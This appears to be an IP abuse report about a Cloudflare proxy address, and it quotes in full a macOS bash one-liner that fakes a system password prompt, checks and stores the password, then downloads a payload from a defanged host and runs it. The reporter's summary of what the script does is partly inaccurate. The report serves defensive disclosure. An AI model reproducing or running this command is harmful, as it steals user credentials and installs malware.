IP info including ISP, Usage Type, and Location provided
by IPInfo. Updated weekly.
Important Note: 172.67.200.78 is an IP address from within
our whitelist belonging to the subnet
172.64.0.0/13,
which we identify as: "Cloudflare Reverse Proxy".
Whitelisted netblocks are typically owned by trusted entities, such as Google
or Microsoft who may use them for search engine spiders. However, these same entities
sometimes also provide cloud servers and mail services which are easily abused. Pay special
attention when trusting or distrusting these IPs.
Date et heure : Dec. 8, 2025
Command :
```
`/bin/bash -c #!/bin/bash username=$(whoami) while tr ...
show moreDate et heure : Dec. 8, 2025
Command :
```
`/bin/bash -c #!/bin/bash username=$(whoami) while true; do echo -n "System Password: " read password echo if dscl . -authonly "$username" "$password" >/dev/null 2>&1; then echo -n "$password" > /tmp/.pass break else echo "Incorrect password! Try again." fi done curl -o /tmp/update hxxps[://]shrimpfc[.]com/ibkr/update >/dev/null 2>&1 echo "$password" | sudo -S xattr -c /tmp/update >/dev/null 2>&1 chmod +x /tmp/update /tmp/update`
```
Script used to:
- identify actively connected users
- open a loop requesting the user's password in a loop
- record attempted passwords in the [/tmp/update] file
- terminate the script by uploading the file containing the passwords to [hxxps[://]shrimpfc[.]com/ibkr/update]
This script was launched following the use of [runningboardd], an โRMMโ type application used to manage application resources on MacOS.
(links cleaned)
show less